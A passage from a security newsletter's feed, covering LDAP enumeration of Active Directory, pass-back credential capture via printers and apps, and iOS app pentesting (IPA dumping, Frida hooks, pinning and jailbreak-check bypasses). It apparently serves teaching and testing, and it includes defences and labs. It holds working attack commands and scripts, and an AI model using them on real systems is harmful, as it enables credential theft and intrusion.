ldapsearch -x -H ldap://dc.example.com -D &quot;CN=John Doe,CN=Users,DC=example,DC=com&quot; -w &apos;password&apos; -b &quot;DC=example,DC=com&quot; &quot;(memberOf=CN=Domain Admins,CN=Users,DC=example,DC=com)&quot; sAMAccountName
```

This lists all members of the &quot;Domain Admins&quot; group.

**Find users with adminCount=1:**

```bash
ldapsearch -x -H ldap://dc.example.com -D &quot;CN=John Doe,CN=Users,DC=example,DC=com&quot; -w &apos;password&apos; -b &quot;DC=example,DC=com&quot; &quot;(adminCount=1)&quot; sAMAccountName
```

Users with `adminCount=1` are (or were) members of protected groups like Domain Admins, Enterprise Admins, or Administrators. Even if they&apos;re no longer in those groups, they often retain elevated privileges due to misconfigured ACLs.

**Find accounts with SPNs (Kerberoastable):**

```bash
ldapsearch -x -H ldap://dc.example.com -D &quot;CN=John Doe,CN=Users,DC=example,DC=com&quot; -w &apos;password&apos; -b &quot;DC=example,DC=com&quot; &quot;(&amp;(objectClass=user)(servicePrincipalName=*))&quot; sAMAccountName servicePrincipalName
```

This identifies accounts vulnerable to Kerberoasting (covered in Issue 2).

**Find computers:**

```bash
ldapsearch -x -H ldap://dc.example.com -D &quot;CN=John Doe,CN=Users,DC=example,DC=com&quot; -w &apos;password&apos; -b &quot;DC=example,DC=com&quot; &quot;(objectClass=computer)&quot; dNSHostName operatingSystem
```

This lists all domain-joined computers with their OS version (useful for targeting outdated systems).

### Extracting Password Policy

LDAP can reveal the domain password policy without privileged access:

```bash
ldapsearch -x -H ldap://dc.example.com -D &quot;CN=John Doe,CN=Users,DC=example,DC=com&quot; -w &apos;password&apos; -b &quot;DC=example,DC=com&quot; &quot;(objectClass=domain)&quot; minPwdLength maxPwdAge lockoutThreshold
```

**Attributes:**
- `minPwdLength`: Minimum password length
- `maxPwdAge`: Password expiration time
- `lockoutThreshold`: Failed login attempts before lockout

This tells you how complex passwords need to be and helps avoid account lockouts during password spraying.

### Finding Privileged Groups

Besides &quot;Domain Admins&quot;, there are other high-value groups:

```bash
ldapsearch -x -H ldap://dc.example.com -D &quot;CN=John Doe,CN=Users,DC=example,DC=com&quot; -w &apos;password&apos; -b &quot;DC=example,DC=com&quot; &quot;(|(cn=Enterprise Admins)(cn=Schema Admins)(cn=Account Operators)(cn=Backup Operators))&quot; member
```

This lists members of multiple privileged groups in one query.

### Identifying Delegation

**Unconstrained Delegation** (very dangerous):

```bash
ldapsearch -x -H ldap://dc.example.com -D &quot;CN=John Doe,CN=Users,DC=example,DC=com&quot; -w &apos;password&apos; -b &quot;DC=example,DC=com&quot; &quot;(&amp;(objectClass=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))&quot; dNSHostName
```

Computers with unconstrained delegation can impersonate any user. If you compromise one of these systems, you can capture TGTs and impersonate domain admins.

**Constrained Delegation:**

```bash
ldapsearch -x -H ldap://dc.example.com -D &quot;CN=John Doe,CN=Users,DC=example,DC=com&quot; -w &apos;password&apos; -b &quot;DC=example,DC=com&quot; &quot;(msDS-AllowedToDelegateTo=*)&quot; sAMAccountName msDS-AllowedToDelegateTo
```

This finds accounts with constrained delegation configured.

### Extracting Descriptions and Comments

Admins sometimes put sensitive info in user descriptions:

```bash
ldapsearch -x -H ldap://dc.example.com -D &quot;CN=John Doe,CN=Users,DC=example,DC=com&quot; -w &apos;password&apos; -b &quot;DC=example,DC=com&quot; &quot;(objectClass=user)&quot; sAMAccountName description
```

Look for things like:
- &quot;Default password: Summer2024&quot;
- &quot;Backup account - pwd never expires&quot;
- &quot;Service account for SQL - check vault&quot;

I&apos;ve seen this more times than I care to admit.

### Scripting LDAP Enumeration

Manual queries are tedious. Automate with **ldapdomaindump**:

```bash
ldapdomaindump -u &apos;example.com\jdoe&apos; -p &apos;password&apos; dc.example.com -o /tmp/ldap_dump
```

This creates HTML and JSON files with:
- Users
- Groups
- Computers
- Trusts
- GPOs

It&apos;s like running all the queries above in one command.

## 🎣 Pass-Back Attacks

Pass-back attacks exploit devices and applications that support LDAP authentication. The idea: change the LDAP server configuration to point to an attacker-controlled server, then trigger an authentication attempt. The device sends credentials to your server instead of the real LDAP server.

This works against:
- Network printers with LDAP/SMB authentication
- Enterprise applications (wikis, ticketing systems)
- Network devices (routers, switches with LDAP auth)
- Embedded systems with LDAP configuration

### How It Works

1. Access the device&apos;s configuration (web interface, SNMP, default creds)
2. Change LDAP server address to your IP
3. Trigger authentication (print a test page, login attempt, etc.)
4. Device sends credentials to your fake LDAP server
5. Capture plaintext credentials

### Example: Printer Pass-Back

Many network printers support &quot;Scan to Folder&quot; features that authenticate to network shares via LDAP.

**Attack steps:**

1. Access printer web interface (often no password, or default `admin/admin`)
2. Navigate to LDAP/Network settings
3. Change LDAP server to attacker IP: `10.10.14.5`
4. Leave credentials fields as-is (they contain service account creds)
5. Save and trigger a scan

The printer attempts to authenticate to your IP with the configured credentials.

**Capture with Responder:**

```bash
sudo responder -I eth0 -v
```

Responder listens for LDAP, SMB, HTTP authentication attempts and captures credentials.

**Or set up a fake LDAP server:**

```bash
# Simple LDAP server that logs authentication attempts
sudo apt install slapd
```

Configure `slapd` to log bind attempts, or use a Python script:

```python
from ldap3 import Server, Connection, ALL

def fake_ldap_server():
    server = Server(&apos;0.0.0.0&apos;, port=389, get_info=ALL)
    # Log incoming bind attempts
    # (Simplified - real implementation needs socket handling)
    print(&quot;[+] Fake LDAP server listening on port 389&quot;)

fake_ldap_server()
```

### Example: Application Pass-Back

Many enterprise apps (Jira, Confluence, GitLab, etc.) support LDAP authentication.

If you compromise an admin account on the app (or find default creds), you can:

1. Navigate to LDAP configuration
2. Change LDAP server to your IP
3. Change LDAP bind DN to a high-privilege account (e.g., `CN=ldapbind,CN=Users,DC=example,DC=com`)
4. Leave password field populated (app stores it)
5. Save settings
6. Trigger LDAP sync or test connection

The app sends the bind credentials to your server.

### Defensive Considerations

**Why does this work?**
- Devices store credentials in plaintext or reversible encryption
- LDAP authentication uses plaintext passwords during bind (unless LDAPS)
- Many devices trust network configuration without validation

**Mitigations:**
- Use LDAPS (LDAP over TLS) to encrypt credentials in transit
- Restrict access to device configuration interfaces
- Use least-privilege service accounts for LDAP binds
- Monitor for LDAP authentication to external IPs

## 🛠️ Tools for LDAP Exploitation

Here are the essential tools for LDAP injection and enumeration:

### Enumeration Tools

**ldapsearch** (Built-in on Linux)
```bash
ldapsearch -x -H ldap://dc.example.com -D &quot;user@example.com&quot; -w &apos;password&apos; -b &quot;DC=example,DC=com&quot; &quot;(objectClass=user)&quot;
```

**ldapdomaindump** (Automated enumeration)
```bash
pip install ldapdomaindump
ldapdomaindump -u &apos;example.com\user&apos; -p &apos;password&apos; dc.example.com
```

**Windapsearch** (Windows-focused LDAP queries)
```bash
python3 windapsearch.py -d example.com -u user -p password --dc-ip 10.10.10.10 -m users
```

Options:
- `-m users`: Enumerate users
- `-m groups`: Enumerate groups
- `-m computers`: Enumerate computers
- `-m privileged-users`: Find admin accounts

**BloodHound** (Graph-based AD analysis)

While BloodHound uses multiple protocols (LDAP, SMB, etc.), it heavily relies on LDAP for enumeration.

```bash
bloodhound-python -u user -p password -d example.com -dc dc.example.com -c all
```

Import JSON files into BloodHound GUI to visualize attack paths.

### Credential Capture

**Responder** (LLMNR/NBT-NS/LDAP poisoning)
```bash
sudo responder -I eth0 -v
```

Captures authentication attempts including LDAP.

**Impacket** (Python SMB/LDAP tools)
```bash
# LDAP enumeration
python3 GetADUsers.py -all example.com/user:password -dc-ip 10.10.10.10

# Kerberoasting via LDAP
python3 GetUserSPNs.py example.com/user:password -dc-ip 10.10.10.10 -request
```

### Custom Scripts

For blind LDAP injection, write custom Python scripts using `ldap3`:

```python
from ldap3 import Server, Connection, ALL

server = Server(&apos;dc.example.com&apos;, get_info=ALL)
conn = Connection(server, user=&apos;example.com\\user&apos;, password=&apos;password&apos;, auto_bind=True)

# Custom LDAP query
conn.search(&apos;DC=example,DC=com&apos;, &apos;(sAMAccountName=admin)&apos;, attributes=[&apos;description&apos;])

for entry in conn.entries:
    print(entry)
```

## 🛡️ Defense and Mitigations

LDAP injection and enumeration abuse are preventable. Here&apos;s how to defend against these attacks:

### Preventing LDAP Injection

**1. Use Parameterized Queries**

Never concatenate user input into LDAP filters. Use parameterized queries or library functions that handle escaping.

**Bad (Vulnerable):**
```php
$filter = &quot;(&amp;(objectClass=user)(uid=$username))&quot;;
```

**Good (Secure):**
```php
// Use ldap_escape() in PHP
$username = ldap_escape($_POST[&apos;username&apos;], &quot;&quot;, LDAP_ESCAPE_FILTER);
$filter = &quot;(&amp;(objectClass=user)(uid=$username))&quot;;
```

**2. Input Validation**

Restrict input to expected characters. For usernames, allow only alphanumeric and limited special characters:

```python
import re

def validate_username(username):
    if not re.match(r&apos;^[a-zA-Z0-9._-]+$&apos;, username):
        raise ValueError(&quot;Invalid username&quot;)
    return username
```

**3. Escape Special Characters**

Escape LDAP special characters: `* ( ) \ NUL`

Most LDAP libraries provide escaping functions:
- PHP: `ldap_escape()`
- Python (ldap3): Use parameterized searches
- Java: `LdapName.escapeAttributeValue()`

### Hardening LDAP Configuration

**1. Use LDAPS (LDAP over TLS)**

Always encrypt LDAP traffic to prevent credential interception:

```bash
# Force LDAPS on Domain Controllers
# Disable LDAP on port 389, require port 636 only
```

**2. Require Signing and Channel Binding**

Enable LDAP signing to prevent tampering and relay attacks:

```
Computer Configuration → Policies → Windows Settings → Security Settings → Local Policies → Security Options
→ Domain controller: LDAP server signing requirements → Require signing
```

**3. Restrict Anonymous LDAP Binds**

Disable anonymous access to LDAP:

```
Computer Configuration → Policies → Windows Settings → Security Settings → Local Policies → Security Options
→ Network access: Allow anonymous SID/Name translation → Disabled
```

**4. Limit LDAP Query Results**

Configure query result size limits to prevent large enumeration dumps:

```
MaxPageSize = 1000  # Limit results per query
```

### Monitoring and Detection

**1. Log LDAP Authentication Failures**

Enable Event ID 2889 (LDAP signing not required) and 2887 (unsigned LDAP binds):

```powershell
# Enable LDAP diagnostic logging
reg add &quot;HKLM\System\CurrentControlSet\Services\NTDS\Diagnostics&quot; /v &quot;16 LDAP Interface Events&quot; /t REG_DWORD /d 2
```

**2. Monitor for LDAP Enumeration**

Alert on:
- Large numbers of LDAP queries from a single source
- Queries for sensitive attributes (`adminCount`, `memberOf`, `servicePrincipalName`)
- LDAP binds from external IPs (pass-back attacks)

**3. Honeypot Accounts**

Create fake high-privilege accounts with monitoring:

```powershell
New-ADUser -Name &quot;admin_backup&quot; -Description &quot;Honeypot account&quot; -Enabled $true
```

Alert when this account is queried or authentication is attempted.

## 🧪 Labs and Practice

Here are resources to practice LDAP injection and AD enumeration:

### Vulnerable Applications

**bWAPP (Buggy Web Application)**
Includes LDAP Injection (Search) module under A1 - Injection category.
[http://www.itsecgames.com/](http://www.itsecgames.com/)

**PentesterLab LDAP Exercises**
Two dedicated exercises: LDAP 01 (NULL Bind) and LDAP 02 (Injection exploitation).
Part of the Essential Badge.
[https://pentesterlab.com/exercises/ldap_01](https://pentesterlab.com/exercises/ldap_01)
[https://pentesterlab.com/exercises/ldap_02](https://pentesterlab.com/exercises/ldap_02)

### Active Directory Labs

**HackTheBox**
Machines with LDAP enumeration and exploitation:
- **Forest** (Easy): LDAP enumeration, AS-REP Roasting
- **Sauna** (Easy): LDAP enumeration, Kerberoasting
- **Resolute** (Medium): LDAP enumeration, privilege escalation

**TryHackMe**
**LDAP Injection** room (Premium):
[https://tryhackme.com/r/room/ldapinjection](https://tryhackme.com/r/room/ldapinjection)

**Active Directory Basics** room:
[https://tryhackme.com/room/winadbasics](https://tryhackme.com/room/winadbasics)

**Attacktive Directory** room:
[https://tryhackme.com/room/attacktivedirectory](https://tryhackme.com/room/attacktivedirectory)

**HackTheBox Academy**
**Injection Attacks** course (includes LDAP injection module):
[https://academy.hackthebox.com/course/preview/injection-attacks](https://academy.hackthebox.com/course/preview/injection-attacks)

### Build Your Own Lab

Set up a local AD lab with vulnerable LDAP configurations:

**Requirements:**
- Windows Server (Domain Controller)
- Windows 10/11 (Domain-joined workstation)
- Kali Linux (Attacker machine)

**Setup steps:**

1. Install Windows Server and promote to DC
2. Create users, groups, and apply weak LDAP configurations
3. Deploy a vulnerable web app with LDAP authentication (or use DVWA)
4. Practice enumeration with `ldapsearch`, `ldapdomaindump`, `BloodHound`
5. Test LDAP injection payloads

**Automation:**

Use [GOAD (Game of Active Directory)](https://github.com/Orange-Cyberdefense/GOAD) for automated vulnerable AD lab deployment:

```bash
git clone https://github.com/Orange-Cyberdefense/GOAD
cd GOAD
vagrant up
```

This creates a multi-domain AD forest with intentional misconfigurations.

### Recommended Reading

**HackTricks - LDAP Injection**
Comprehensive guide on LDAP injection techniques and blind LDAP exploitation.
[https://book.hacktricks.xyz/pentesting-web/ldap-injection](https://book.hacktricks.xyz/pentesting-web/ldap-injection)

**HackTricks - Pentesting LDAP**
Guide on pentesting LDAP services (ports 389, 636, 3268, 3269).
[https://book.hacktricks.xyz/network-services-pentesting/pentesting-ldap](https://book.hacktricks.xyz/network-services-pentesting/pentesting-ldap)

**OWASP - LDAP Injection**
Overview of LDAP injection attacks and exploitation techniques.
[https://owasp.org/www-community/attacks/LDAP_Injection](https://owasp.org/www-community/attacks/LDAP_Injection)

**OWASP - LDAP Injection Prevention Cheat Sheet**
Best practices for preventing LDAP injection vulnerabilities.
[https://cheatsheetseries.owasp.org/cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html)

**OWASP Testing Guide - LDAP Injection**
Testing methodology for identifying LDAP injection vulnerabilities.
[https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/06-Testing_for_LDAP_Injection](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/06-Testing_for_LDAP_Injection)

**Active Directory Security Blog (ADSecurity.org)**
In-depth Active Directory security research and attack techniques.
[https://adsecurity.org/](https://adsecurity.org/)

## 🎯 Wrapping Up

LDAP injection is one of those vulnerabilities that&apos;s less talked about than SQL injection or XSS, but just as dangerous when you find it. It can lead to authentication bypass, information disclosure, and privilege escalation in one shot. And because LDAP is the backbone of Active Directory, the impact is often domain-wide.

Beyond injection, LDAP enumeration with valid credentials is a goldmine. You can map the entire domain, identify privilege escalation paths, and find high-value targets, all through legitimate LDAP queries. Pass-back attacks add another layer, turning LDAP configuration access into credential harvesting.

The key takeaways:

**For attackers:**
- Test LDAP authentication fields for injection with `*`, `)(`, and logical operators
- Use blind injection techniques when direct output isn&apos;t visible
- Enumerate AD via LDAP with tools like `ldapsearch`, `ldapdomaindump`, and `BloodHound`
- Look for pass-back opportunities in printers, apps, and network devices

**For defenders:**
- Parameterize LDAP queries and escape user input
- Use LDAPS to encrypt credentials in transit
- Restrict anonymous LDAP binds and enforce signing
- Monitor for large-scale LDAP enumeration and authentication to external IPs
- Deploy honeypot accounts to detect enumeration attempts

If you&apos;re pentesting corporate environments, LDAP should be on your checklist alongside Kerberos and NTLM attacks. It&apos;s often overlooked, which makes it a perfect target.

Next issue, we&apos;ll likely shift back to web or cloud topics. But for now, go break some directories.

Until next time,
Ruben</content:encoded><category>Newsletter</category><category>active-directory</category><author>Ruben Santos</author></item><item><title>iOS Security Testing: From IPA Analysis to Runtime Manipulation</title><link>https://www.kayssel.com/newsletter/issue-29</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-29</guid><description>A practical guide to iOS pentesting covering IPA decompilation, Frida hooking, certificate pinning bypass, and jailbreak detection circumvention</description><pubDate>Sun, 21 Dec 2025 09:00:00 GMT</pubDate><content:encoded>## 👋 Introduction

Hey everyone!

I&apos;ve been putting this off for too long. iOS security testing always felt like it required too much setup. You need a Mac. A jailbroken device. Xcode. Certificates. The barrier to entry seemed high compared to Android where you can spin up an emulator and start testing in minutes.

But here&apos;s the reality: you can get started with a cheap second-hand iPhone and a Linux box. Do you need a Mac? Not really. Does it make your life easier? Absolutely. But don&apos;t let the lack of a Mac stop you. Most of the work happens with cross-platform tools.

iOS apps handle sensitive data just like Android apps. Banking credentials. Authentication tokens. API keys. And while Apple&apos;s security model is more restrictive, that doesn&apos;t mean iOS apps are automatically secure. Developers still make mistakes. And those mistakes are exploitable.

What changed my perspective was realizing you don&apos;t need a fully jailbroken device to find most vulnerabilities. Static analysis of IPA files catches a surprising amount of issues. Objection (built on Frida) works on non-jailbroken devices for many common tasks. And when you do need a jailbroken device, tools like Corellium provide cloud-based virtual devices.

The attack surface is real. Apps with hardcoded API keys. Certificate pinning implementations that can be bypassed in seconds. Insecure data storage in plists and keychains. Jailbreak detection that&apos;s trivial to circumvent. The difference is iOS security testing requires understanding Apple&apos;s ecosystem and tooling.

In this issue, we&apos;ll start with iOS app structure and IPA format to understand what we&apos;re working with. Then we&apos;ll dive into static analysis techniques for decompiling IPAs and extracting secrets. From there, we&apos;ll move to dynamic analysis with Frida for runtime manipulation and hooking. You&apos;ll learn how to bypass certificate pinning to intercept HTTPS traffic, circumvent jailbreak detection, and understand keychain security. We&apos;ll wrap up with essential tools and hands-on labs you can use to practice.

If you&apos;re already comfortable with Android pentesting but haven&apos;t touched iOS, or if you&apos;re auditing mobile apps and need to expand to iOS, this is your starting point.

Let&apos;s break some apps 👇

## 📱 iOS Security Fundamentals

Before we start breaking things, let&apos;s talk about what makes iOS different from Android. Apple&apos;s security model is more locked down, but that doesn&apos;t mean it&apos;s unbreakable.

### The iOS Security Model

Every iOS app runs in its own sandbox. Apps can&apos;t peek at other apps&apos; data or system resources without explicit permission. This isolation is enforced at the kernel level, which is both good news and bad news for pentesters.

Code signing is non-negotiable. All apps must be signed with a valid certificate. Even on jailbroken devices, unsigned code won&apos;t run without disabling signature verification first. This means you can&apos;t just patch a binary and execute it like you might on Android.

Entitlements are basically a permission manifest. Special capabilities like keychain access, push notifications, or App Groups must be declared upfront in the app&apos;s entitlements plist. This gives you a quick way to see what sensitive APIs an app can touch.

Apple also throws in ASLR (Address Space Layout Randomization) and stack canaries by default. Memory addresses get randomized, and buffer overflow protection is baked in. This makes memory corruption exploits harder to pull off, though not impossible.

Here&apos;s what this means for you as a pentester. Sandboxing limits lateral movement between apps. You can&apos;t easily pivot after initial compromise. Code signing means you can&apos;t just patch and rerun without resigning the whole thing. But entitlements tell you exactly what sensitive APIs the app can access, giving you a roadmap of potential attack surfaces.

### Understanding IPA Files

Here&apos;s something that might surprise you: an IPA (iOS App Store Package) is just a ZIP file. Seriously. Rename it to .zip and you can unpack it with any archive tool.

**Structure**:
```
MyApp.ipa
└── Payload/
    └── MyApp.app/
        ├── MyApp (Mach-O binary)
        ├── Info.plist (app metadata)
        ├── embedded.mobileprovision (signing info)
        ├── Frameworks/ (bundled frameworks)
        ├── Assets.car (compiled assets)
        └── [various resource files]
```

**Key files to examine:**

**MyApp** (Mach-O binary): The actual compiled executable. This is what you decompile and analyze.

**Info.plist**: App configuration, bundle identifier, URL schemes, required device capabilities.

**embedded.mobileprovision**: Provisioning profile with entitlements and signing certificates.

**Frameworks/**: Third-party libraries (often where vulnerabilities hide).

### Objective-C vs Swift

iOS apps are written in Objective-C, Swift, or a mix of both.

Objective-C is a reverse engineer&apos;s dream. It has a dynamic runtime that&apos;s easy to hook and manipulate. Class and method names are preserved right there in the binary. You can literally see what the code is doing.

Swift is different. It compiles to LLVM IR then native code with aggressive name mangling. Method names turn into cryptic strings like `_T04MyApp13LoginViewModelC5loginyyF`. Annoying? Yes. Impossible to reverse? Not at all. You just need the right tools and a bit more patience.

Most production apps are a mix of both. Legacy code stays in Objective-C while new features get written in Swift. This is actually good for you because it gives you multiple attack surfaces to explore. Some parts are easy to reverse, others take more work.

## 🔍 Static Analysis: Decompiling IPA Files

Static analysis is where you find the low-hanging fruit. I&apos;m talking hardcoded API keys, insecure storage, vulnerable dependencies. The stuff developers hoped you&apos;d never look for.

### Obtaining IPA Files

First problem: apps from the App Store are encrypted with FairPlay DRM. You can&apos;t just download them and start analyzing. You need to decrypt them first.

**Method 1: Decrypt from Jailbroken Device**

This is the most reliable way. If you have a jailbroken device, you can dump decrypted IPAs directly from memory while the app is running.

Tools:
- **[frida-ios-dump](https://github.com/AloneMonkey/frida-ios-dump)**: Dumps decrypted IPAs from a running app
- **[Clutch](https://github.com/KJCracks/Clutch)**: Decrypts and dumps App Store apps
- **[bfinject](https://github.com/BishopFox/bfinject)**: Decrypts apps and extracts IPAs

Example with frida-ios-dump:
```bash
# Install on jailbroken device
git clone https://github.com/AloneMonkey/frida-ios-dump
cd frida-ios-dump
pip3 install -r requirements.txt

# Dump app (device must have frida-server running)
python3 dump.py -l  # List apps
python3 dump.py com.example.targetapp
```

**Method 2: Extract from Xcode Simulator** (for development builds)

```bash
# Find the app bundle
xcrun simctl list devices
xcrun simctl get_app_container booted com.example.app

# Copy to current directory
cp -r /path/to/app/container/MyApp.app .
zip -r MyApp.ipa Payload/MyApp.app
```

**Method 3: Download from Third-Party Sources**

Sites like [iOSGods](https://iosgods.com/) or [AppDB](https://appdb.to/) host decrypted IPAs. This is the quickest option but also the sketchiest. You&apos;re trusting someone else&apos;s decrypt, and you have no idea if they modified the binary. Use with caution, and never test production apps this way.

### Analyzing the Binary

Once you have the IPA, extract it:

```bash
unzip MyApp.ipa
cd Payload/MyApp.app
```

**Check binary type**:
```bash
file MyApp
# Output: Mach-O 64-bit executable arm64
```

**List classes and methods** (Objective-C):
```bash
# Install class-dump
brew install class-dump

# Dump class headers
class-dump MyApp &gt; headers.txt
```

Example output:
```objc
@interface LoginViewController : UIViewController
- (void)loginButtonTapped:(id)arg1;
- (void)storeCredentials:(NSString *)username password:(NSString *)password;
@end
```

Now you know the app has a `LoginViewController` with methods for login and credential storage. That&apos;s your target. Time to see what it&apos;s actually doing.

**For Swift binaries**, use [dsdump](https://github.com/DerekSelander/dsdump):
```bash
dsdump MyApp &gt; swift_headers.txt
```

### Decompiling with Ghidra, Hopper, or radare2

**Ghidra** is free and powerful. Download it from ghidra-sre.org, import your binary, run auto-analysis, and start exploring. It handles Mach-O files just fine, though the interface takes some getting used to.

**Hopper Disassembler** costs $99 but it&apos;s worth it if you&apos;re doing this regularly. It&apos;s specifically optimized for ARM and Mach-O binaries, generates cleaner pseudo-code than Ghidra, and has an integrated debugger. The workflow is smoother and you&apos;ll save time in the long run.

**radare2** (or its fork **rizin**) is the command-line option. Steep learning curve, but incredibly powerful once you get the hang of it. It&apos;s cross-platform, handles Mach-O binaries natively, and has excellent scripting capabilities. The visual mode (`V` command) gives you a TUI for disassembly and debugging. If you&apos;re comfortable with the terminal, r2 can do everything Ghidra does and more.

When analyzing the decompiled code, look for hardcoded API keys, tokens, and secrets that developers thought would be safe in compiled code. Check for insecure cryptographic implementations like hardcoded IVs or weak encryption modes. Identify URL endpoints to map out the backend API. Find certificate pinning logic so you know what you&apos;ll need to bypass. Locate jailbreak detection code you&apos;ll want to circumvent. And watch for debug logging that leaks sensitive data in production builds.

### Searching for Secrets

**Extract strings**:
```bash
strings MyApp | grep -i &quot;api\|key\|token\|secret\|password&quot;
```

**Search in plists**:
```bash
find . -name &quot;*.plist&quot; -exec plutil -p {} \;
```

**Check for embedded files**:
```bash
# Look for .json, .xml, .db files
find . -type f | grep -E &quot;\.(json|xml|db|sqlite)$&quot;
```

**Automated secret scanning**:
```bash
# Use trufflehog or gitleaks on extracted IPA contents
trufflehog filesystem --directory Payload/
```

## 🔨 Dynamic Analysis with Frida

Here&apos;s where things get interesting. Frida lets you inject JavaScript into running iOS apps. You can hook functions, modify behavior, and extract data in real-time. It&apos;s like having a debugger on steroids.

### Setting Up Frida on iOS

**Requirements:**
- Jailbroken iOS device OR non-jailbroken with Corellium/third-party signing
- frida-server running on device

**Installing frida-server** (jailbroken device):
```bash
# On your computer
brew install frida-tools

# On iOS device (via SSH)
# Add Frida repo to Cydia: https://build.frida.re
# Install &quot;Frida&quot; package

# Verify frida-server is running
frida-ps -U  # List running processes on USB device
```

### Basic Frida Hooking

**List running apps**:
```bash
frida-ps -Ua  # -U for USB, -a for apps
```

**Attach to an app**:
```bash
frida -U -n &quot;Target App&quot;
```

**Hook a method** (Objective-C):
```javascript
// Hook LoginViewController&apos;s loginButtonTapped method
if (ObjC.available) {
    var LoginVC = ObjC.classes.LoginViewController;

    Interceptor.attach(LoginVC[&apos;- loginButtonTapped:&apos;].implementation, {
        onEnter: function(args) {
            console.log(&quot;[+] loginButtonTapped called&quot;);
            // args[0] = self, args[1] = selector, args[2] = first argument
        },
        onLeave: function(retval) {
            console.log(&quot;[+] loginButtonTapped finished&quot;);
        }
    });
}
```

**Hook a Swift method**:
```javascript
// Swift method names are mangled
// Use frida-trace or objection to find the real name
var swiftMethod = Module.findExportByName(null, &quot;_T04MyApp18LoginViewControllerC16loginButtonTappedyypF&quot;);

if (swiftMethod) {
    Interceptor.attach(swiftMethod, {
        onEnter: function(args) {
            console.log(&quot;[+] Swift login method called&quot;);
        }
    });
}
```

**Read function arguments**:
```javascript
// Hook storeCredentials method
var LoginVC = ObjC.classes.LoginViewController;

Interceptor.attach(LoginVC[&apos;- storeCredentials:password:&apos;].implementation, {
    onEnter: function(args) {
        var username = ObjC.Object(args[2]).toString();
        var password = ObjC.Object(args[3]).toString();
        console.log(&quot;[+] Credentials: &quot; + username + &quot; / &quot; + password);
    }
});
```

**Modify return values**:
```javascript
// Bypass jailbreak detection
var JailbreakDetector = ObjC.classes.JailbreakDetector;

Interceptor.attach(JailbreakDetector[&apos;- isJailbroken&apos;].implementation, {
    onLeave: function(retval) {
        console.log(&quot;[+] Original jailbreak check: &quot; + retval);
        retval.replace(0);  // Always return NO (false)
        console.log(&quot;[+] Bypassed jailbreak check&quot;);
    }
});
```

### Objection: Frida Made Easy

[Objection](https://github.com/sensepost/objection) is built on top of Frida and simplifies all the common tasks. Think of it as Frida with training wheels, except the training wheels are actually really good.

**Installation**:
```bash
pip3 install objection
```

**Basic usage**:
```bash
# Attach to running app
objection -g &quot;Target App&quot; explore

# Inside objection REPL:
ios hooking list classes         # List all classes
ios hooking search classes Login # Search for classes
ios hooking list class_methods LoginViewController  # List methods
ios hooking watch method &quot;-[LoginViewController loginButtonTapped:]&quot;  # Hook method
ios pasteboard monitor           # Monitor clipboard
ios keychain dump                # Dump keychain (jailbroken)
ios nsurlcredentialstorage dump  # Dump stored credentials
ios ui dump                      # Dump UI hierarchy
```

**Disable SSL pinning with one command**:
```bash
objection&gt; ios sslpinning disable
```

Yep, that&apos;s it. One command and Objection automatically hooks the most common pinning implementations. It won&apos;t catch custom implementations, but it handles NSURLSession, AFNetworking, and Alamofire out of the box.

## 🔐 Bypassing Certificate Pinning

Certificate pinning is supposed to prevent MITM attacks by validating the server&apos;s certificate against a pinned cert or public key. Great for security, annoying for pentesting. You need to bypass it to intercept HTTPS traffic with Burp or mitmproxy.

The good news? Most pinning implementations are easy to defeat.

### Understanding iOS Pinning Implementations

**1. NSURLSession Pinning** (native iOS):
```objc
// App code checks certificate in delegate method
- (void)URLSession:(NSURLSession *)session
didReceiveChallenge:(NSURLAuthenticationChallenge *)challenge
completionHandler:(void (^)(NSURLSessionAuthChallengeDisposition, NSURLCredential *))completionHandler {
    // Pinning logic here
}
```

**2. AFNetworking / Alamofire** (popular libraries):
- AFNetworking (Objective-C): `AFSecurityPolicy`
- Alamofire (Swift): `ServerTrustManager`

**3. TrustKit** (open-source pinning library)

**4. Custom implementations**

### Bypass Method 1: SSL Kill Switch 2

**[SSL Kill Switch 2](https://github.com/nabla-c0d3/ssl-kill-switch2)** is a Cydia tweak that disables pinning system-wide.

**Important limitation**: SSL Kill Switch 2 only works up to iOS 14.2. If you&apos;re testing anything on iOS 15 or newer, skip this and go straight to Frida or Objection instead.

**Installation** (jailbroken device, iOS ≤ 14.2):
```bash
# Add repo to Cydia: https://cydia.akemi.ai
# Install &quot;SSL Kill Switch 2&quot;
# Enable in Settings app
```

Relaunch the app. All pinning bypassed on supported iOS versions.

### Bypass Method 2: Objection

```bash
objection -g &quot;Target App&quot; explore
objection&gt; ios sslpinning disable
```

This hooks common pinning methods at runtime.

### Bypass Method 3: Frida Script

Manual Frida script for NSURLSession pinning bypass:

```javascript
if (ObjC.available) {
    // Hook NSURLSession challenge handler
    var NSURLSession = ObjC.classes.NSURLSession;

    Interceptor.attach(
        ObjC.classes.NSURLSession[&apos;- URLSession:didReceiveChallenge:completionHandler:&apos;].implementation,
        {
            onEnter: function(args) {
                console.log(&quot;[+] NSURLSession challenge intercepted&quot;);

                // args[2] = challenge
                // args[3] = completionHandler block

                // Call completion handler with NSURLSessionAuthChallengeUseCredential
                var completionHandler = new ObjC.Block(args[3]);
                var credential = ObjC.classes.NSURLCredential.credentialForTrust_(args[2].protectionSpace().serverTrust());

                completionHandler(1, credential);  // 1 = NSURLSessionAuthChallengeUseCredential
            }
        }
    );
}
```

**For AFNetworking**:
```javascript
// Hook AFSecurityPolicy
var AFSecurityPolicy = ObjC.classes.AFSecurityPolicy;

if (AFSecurityPolicy) {
    Interceptor.attach(AFSecurityPolicy[&apos;- setSSLPinningMode:&apos;].implementation, {
        onEnter: function(args) {
            console.log(&quot;[+] AFNetworking pinning disabled&quot;);
            args[2] = 0;  // AFSSLPinningModeNone
        }
    });
}
```

### Setting Up Burp Suite

Once pinning is bypassed, configure the device to use Burp as proxy:

**1. Install Burp CA Certificate**:
- Start Burp, go to Proxy &gt; Options
- Export CA certificate
- Email it to yourself, open on iOS device
- Settings &gt; General &gt; VPN &amp; Device Management &gt; Install Profile

**2. Trust the certificate**:
- Settings &gt; General &gt; About &gt; Certificate Trust Settings
- Enable &quot;PortSwigger CA&quot;

**3. Configure proxy**:
